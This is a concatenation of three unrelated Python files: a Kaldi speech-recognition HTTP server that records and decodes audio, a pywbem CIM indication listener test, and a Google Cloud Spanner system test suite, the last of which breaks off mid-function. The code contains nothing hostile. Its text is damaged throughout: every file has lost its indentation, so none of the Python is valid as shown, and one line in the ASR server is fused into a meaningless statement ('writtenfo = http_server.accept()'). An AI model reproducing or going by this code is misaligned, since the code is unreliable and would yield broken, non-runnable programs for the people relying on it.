# * "do_record" : boolean, if true record to wav file on disk
# * "do_asr" : boolean, if true start/continue kaldi ASR
# * "do_finalize" : boolean, if true finish kaldi ASR, return decoded string
#
# Returns:
#
# * 400 if request is invalid
# * 200 OK
# * 201 OK {"hstr": "hello world", "confidence": 0.02, "audiofn": "data/recordings/anonymous-20170105-rec/wav/de5-005.wav"}
#
# Example:
#
# curl -i -H "Content-Type: application/json" -X POST \
# -d '{"audio": [1,2,3,4], "do_record": true, "do_asr": true, "do_finalize": true}' \
# http://localhost:8301/decode
import os
import sys
import logging
import traceback
import json
import datetime
import wave
import errno
import struct
from time import time
from optparse import OptionParser
from setproctitle import setproctitle
#from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from http.server import BaseHTTPRequestHandler,HTTPServer
sys.path.append(r'/wmh/py-kaldi-asr/kaldiasr')
from nnet3 import KaldiNNet3OnlineModel, KaldiNNet3OnlineDecoder
import numpy as np
#multi process
import multiprocessing
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = 8001
NUM_WOKER=5
DEFAULT_MODEL_DIR = 'data/models/kaldi-dianhua-cn-8k-2700h-tdnnf-baseline'
#DEFAULT_MODEL_DIR = 'data/models/kaldi-generic-cn-16k-1wh-tdnnf-fun9_v1'
#DEFAULT_MODEL_DIR = 'data/models/kaldi-generic-en-16k-1200h-tdnnf-r20190609'
DEFAULT_MODEL = 'model'
DEFAULT_VF_LOGIN = 'anonymous'
DEFAULT_REC_DIR = 'data/recordings'
SAMPLE_RATE = 8000
PROC_TITLE = 'asr_server'
audiofn = '' # path to current wav file being written
wf = None # current wav file being writtenfo = http_server.accept()
class SpeechHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_error(400, 'Invalid request')
def do_HEAD(self):
self._set_headers()
def do_POST(self):
global wf, decoder, vf_login, recordings_dir, audiofn
print('server process id:', os.getpid())
logging.debug("POST %s" % self.path)
if self.path=="/decode":
data = json.loads(self.rfile.read(int(self.headers['content-length'])))
#print(data)
audio = data['audio']
do_record = data['do_record']
do_asr = data['do_asr']
do_finalize = data['do_finalize']
hstr = ''
confidence = 0.0
# FIXME: remove audio = map(lambda x: int(x), audios.split(','))
if do_record:
# store recording in WAV format
if not wf:
ds = datetime.date.strftime(datetime.date.today(), '%Y%m%d')
audiodirfn = '%s/%s-%s-rec/wav' % (recordings_dir, vf_login, ds)
logging.debug('audiodirfn: %s' % audiodirfn)
mkdirs(audiodirfn)
cnt = 0
while True:
cnt += 1
audiofn = '%s/de5-%03d.wav' % (audiodirfn, cnt)
if not os.path.isfile(audiofn):
break
logging.debug('audiofn: %s' % audiofn)
# create wav file
wf = wave.open(audiofn, 'wb')
wf.setnchannels(1)
wf.setsampwidth(2)
wf.setframerate(SAMPLE_RATE)
packed_audio = struct.pack('%sh' % len(audio), *audio)
wf.writeframes(packed_audio)
if do_finalize:
wf.close()
wf = None
else:
audiofn = ''
if do_asr:
decoder.decode(SAMPLE_RATE, np.array(audio, dtype=np.float32), do_finalize)
if do_finalize:
hstr, confidence = decoder.get_decoded_string()
logging.info ( "** confidence: %9.5f , result: %s" % (confidence, hstr))
logging.debug ( "*****************************************************************************")
logging.debug ( "**")
logging.debug ( "** %9.5f %s" % (confidence, hstr))
logging.debug ( "**")
logging.debug ( "*****************************************************************************")
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
reply = {'hstr': hstr, 'confidence': confidence, 'audiofn': audiofn}
self.wfile.write(json.dumps(reply).encode())
return
#ForkingMixIn, ThreadingMixIn
if __name__ == '__main__':
setproctitle (PROC_TITLE)
#
# commandline
#
parser = OptionParser("usage: %prog [options] ")
parser.add_option ("-v", "--verbose", action="store_true", dest="verbose",
help="verbose output")
parser.add_option ("-H", "--host", dest="host", type = "string", default=DEFAULT_HOST,
help="host, default: %s" % DEFAULT_HOST)
parser.add_option ("-p", "--port", dest="port", type = "int", default=DEFAULT_PORT,
help="port, default: %d" % DEFAULT_PORT)
parser.add_option ("-d", "--model-dir", dest="model_dir", type = "string", default=DEFAULT_MODEL_DIR,
help="kaldi model directory, default: %s" % DEFAULT_MODEL_DIR)
parser.add_option ("-m", "--model", dest="model", type = "string", default=DEFAULT_MODEL,
help="kaldi model, default: %s" % DEFAULT_MODEL)
parser.add_option ("-r", "--recordings-dir", dest="recordings_dir", type = "string", default=DEFAULT_REC_DIR,
help="wav recordings directory, default: %s" % DEFAULT_REC_DIR)
parser.add_option ("-l", "--voxforge-login", dest="vf_login", type = "string", default=DEFAULT_VF_LOGIN,
help="voxforge login (used in recording filename generation), default: %s" % DEFAULT_VF_LOGIN)
(options, args) = parser.parse_args()
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
kaldi_model_dir = options.model_dir
kaldi_model = options.model
vf_login = options.vf_login
recordings_dir = options.recordings_dir
#
# setup kaldi decoder
#
start_time = time()
logging.info('%s loading model from %s ...' % (kaldi_model, kaldi_model_dir))
nnet3_model = KaldiNNet3OnlineModel (kaldi_model_dir, kaldi_model)
logging.info('%s loading model... done. took %fs.' % (kaldi_model, time()-start_time))
decoder = KaldiNNet3OnlineDecoder (nnet3_model)
#
# run HTTP server
#
try:
print('main process id:', os.getpid())
i=0
while i < NUM_WOKER :
port=int(options.port)+i
print(port)
server = HTTPServer((options.host, port), SpeechHandler)
p=multiprocessing.Process(target=server.serve_forever)
logging.info('listening for HTTP requests on %s:%d' % (options.host, options.port))
#server.serve_forever()
p.start()
i=i+1
print("total "+str(NUM_WOKER)+" ports start, form port id "+str(DEFAULT_PORT))
except KeyboardInterrupt:
logging.error('^C received, shutting down the web server')
server.socket.close()
|
TestIndications.py | #!/usr/bin/python
#
# Simple indication receiver using Twisted Python. HTTP post requests
# are listened for on port 5988 and port 5899 using SSL.
#
# Requires Twisted Python and
#
import sys
import optparse
from twisted.internet import reactor, ssl
from twisted.web import server, resource
import pywbem
import threading
from socket import getfqdn
from twisted.python import log
import time
from lib import wbem_connection
_interop_ns = None
_port = 5309
_num_to_send = pywbem.Uint16(42)
class CIMListener(resource.Resource):
""" CIM Listener
"""
isLeaf = 1
def __init__(self, callback, http_port=5988):
self.callback = callback
self.http_port = http_port
site = server.Site(self)
reactor.listenTCP(self.http_port, site)
def stop(self):
reactor.stop()
def run(self):
reactor.run()
def render_POST(self, request):
tt = pywbem.parse_cim(pywbem.xml_to_tupletree(request.content.read()))
insts = [x[1] for x in tt[2][2][0][2][2]]
for inst in insts:
self.callback(inst)
return ''
def createFilter( ch, query='select * from CIM_ProcessIndication',
ns=_interop_ns,
querylang='WQL',
src_ns='root/cimv2',
in_name=None):
name = in_name or 'cimfilter%s'%time.time()
filterinst=pywbem.CIMInstance('CIM_IndicationFilter')
filterinst['CreationClassName']='CIM_IndicationFilter'
filterinst['SystemCreationClassName']='CIM_ComputerSystem'
filterinst['SystemName']=getfqdn()
filterinst['Name']=name
filterinst['Query']=query
filterinst['QueryLanguage']=querylang
filterinst['SourceNamespace']=src_ns
cop = pywbem.CIMInstanceName('CIM_IndicationFilter')
cop.keybindings = { 'CreationClassName':'CIM_IndicationFilter',
'SystemClassName':'CIM_ComputerSystem',
'SystemName':getfqdn(),
'Name':name }
cop.namespace=ns
filterinst.path = cop
filtercop = ch.CreateInstance(filterinst)
return filtercop
def deleteAllSubs(ch, destination='http://localhost:%s' % _port,
ns=_interop_ns):
subs = ch.EnumerateInstanceNames('CIM_IndicationSubscription',
namespace=ns)
num = 0
for sub in subs:
handler_name = sub['Handler']
try:
handler = ch.GetInstance(handler_name, PropertyList=['Destination'])
except pywbem.CIMError, args:
print "** Error fetching handler instance: %s %s" % \
(handler_name, args)
continue
if handler['Destination'] == destination:
deleteSubscription(ch, sub)
num+= 1
if num > 0:
print '** deleted %d subscriptions' % num
def createDest( ch, destination='http://localhost:%s' % _port,
ns=_interop_ns,
in_name=None):
name = in_name or 'cimlistener%s'%time.time()
destinst=pywbem.CIMInstance('CIM_ListenerDestinationCIMXML')
destinst['CreationClassName']='CIM_ListenerDestinationCIMXML'
destinst['SystemCreationClassName']='CIM_ComputerSystem'
destinst['SystemName']=getfqdn()
destinst['Name']=name
destinst['Destination']=destination
cop = pywbem.CIMInstanceName('CIM_ListenerDestinationCIMXML')
cop.keybindings = { 'CreationClassName':'CIM_ListenerDestinationCIMXML',
'SystemClassName':'CIM_ComputerSystem',
'SystemName':getfqdn(),
'Name':name }
cop.namespace=ns
destinst.path = cop
destcop = ch.CreateInstance(destinst)
return destcop
def createSubscription(ch, ns=_interop_ns):
replace_ns = ch.default_namespace
ch.default_namespace=ns
indfilter=createFilter(ch, ns=ns)
indhandler=createDest(ch, ns=ns)
subinst=pywbem.CIMInstance('CIM_IndicationSubscription')
subinst['Filter']=indfilter
subinst['Handler']=indhandler
cop = pywbem.CIMInstanceName('CIM_IndicationSubscription')
cop.keybindings = { 'Filter':indfilter,
'Handler':indhandler }
cop.namespace=ns
subinst.path = cop
subcop = ch.CreateInstance(subinst)
ch.default_namespace=replace_ns
return subcop
def deleteSubscription(ch, subcop):
indfilter = subcop['Filter']
indhandler= subcop['Handler']
ch.DeleteInstance(subcop)
ch.DeleteInstance(indfilter)
ch.DeleteInstance(indhandler)
# end indication support methods
#log.startLogging(sys.stdout)
_lock = threading.RLock()
_shutdown = False
_insts_received = 0
if __name__ == '__main__':
parser = optparse.OptionParser()
wbem_connection.getWBEMConnParserOptions(parser)
parser.add_option('--verbose', '', action='store_true', default=False,
help='Show verbose output')
parser.add_option('--level',
'-l',
action='store',
type='int',
dest='dbglevel',
help='Indicate the level of debugging statements to display (default=2)',
default=2)
_g_opts, _g_args = parser.parse_args()
conn = wbem_connection.WBEMConnFromOptions(parser)
nss = ['root/interop', 'root/cimv2']
for ns in nss:
try:
conn.GetClass('CIM_IndicationSubscription', namespace=ns)
_interop_ns = ns
break
except pywbem.CIMError, arg:
if arg[0] in [pywbem.CIM_ERR_INVALID_CLASS,
pywbem.CIM_ERR_INVALID_NAMESPACE]:
continue
raise
else:
print 'Unable to find class CIM_IndicationSubscription in namespaces',\
nss
sys.exit(1)
def cb(inst):
global _lock
global _shutdown
global _insts_received
global _num_to_send
sys.stdout.write('.'); sys.stdout.flush()
_lock.acquire()
_insts_received+= 1
if _num_to_send == _insts_received:
_shutdown = True
_lock.release()
cl = CIMListener(callback=cb, http_port=5309)
deleteAllSubs(conn, ns=_interop_ns)
def threadfunc():
try:
time.sleep(1)
numrcv = 0
subcop = createSubscription(conn, ns=_interop_ns)
time.sleep(1)
conn.InvokeMethod('reset_indication_count', 'Test_UpcallAtom')
print 'Waiting for %s indications...' % _num_to_send
countsent,outs = conn.InvokeMethod('send_indications',
'Test_UpcallAtom', num_to_send=_num_to_send)
numsent,outs = conn.InvokeMethod('get_indication_send_count',
'Test_UpcallAtom')
deleteSubscription(conn, subcop)
if (countsent != numsent):
print("\nsend_indications NumSent(%d) doesn't match get_indication_send_count NumSent(%d)\n"%(countsent, numsent));
sys.exit(1)
for i in xrange(20):
_lock.acquire()
if _shutdown:
reactor.stop()
_lock.release()
if not reactor.running:
break
time.sleep(.5)
if reactor.running:
reactor.stop()
except:
if reactor.running:
reactor.stop()
raise
thread = threading.Thread(target=threadfunc)
thread.start()
reactor.run()
print ''
if _num_to_send != _insts_received:
print 'Expected %s exceptions, got %s' % (_num_to_send, _insts_received)
print 'Indication Tests failed!'
sys.exit(1)
else:
print 'Indication Tests passed.'
|
test_system.py | # Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1.proto.type_pb2 import ARRAY
from google.cloud.spanner_v1.proto.type_pb2 import BOOL
from google.cloud.spanner_v1.proto.type_pb2 import BYTES
from google.cloud.spanner_v1.proto.type_pb2 import DATE
from google.cloud.spanner_v1.proto.type_pb2 import FLOAT64
from google.cloud.spanner_v1.proto.type_pb2 import INT64
from google.cloud.spanner_v1.proto.type_pb2 import STRING
from google.cloud.spanner_v1.proto.type_pb2 import TIMESTAMP
from google.cloud.spanner_v1.proto.type_pb2 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner import Client
from google.cloud.spanner import KeyRange
from google.cloud.spanner import KeySet
from google.cloud.spanner import BurstyPool
from google.cloud.spanner import COMMIT_TIMESTAMP
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
return len(database.ddl_statements) == len(DDL_STATEMENTS)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID, config_name)
created_op = Config.INSTANCE.create()
created_op.result(30) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance instance and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance instance and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"phred@example.com"),
(2, u"Bharney", u"Rhubble", u"bharney@example.com"),
(3, u"Wylma", u"Phlyntstone", u"wylma@example.com"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=DDL_STATEMENTS, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [
database.database_id for database in Config.INSTANCE.list_databases()
]
self.assertIn(temp_db_id, database_ids)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# random but shortish always start with letter
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(DDL_STATEMENTS, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(DDL_STATEMENTS))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=DDL_STATEMENTS, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(30) # raises on failure / timeout.
op2.result(30) # raises on failure / timeout.
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config
)
op = cls._same_config_instance.create()
op.result(30)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name is not current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0]
)
op = cls._diff_config_instance.create()
op.result(30)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
database = instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
invalid_expire_time = datetime.now() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
if self._diff_config_instance is not None:
return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(30)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
backup1 = Config.INSTANCE.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time_1
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
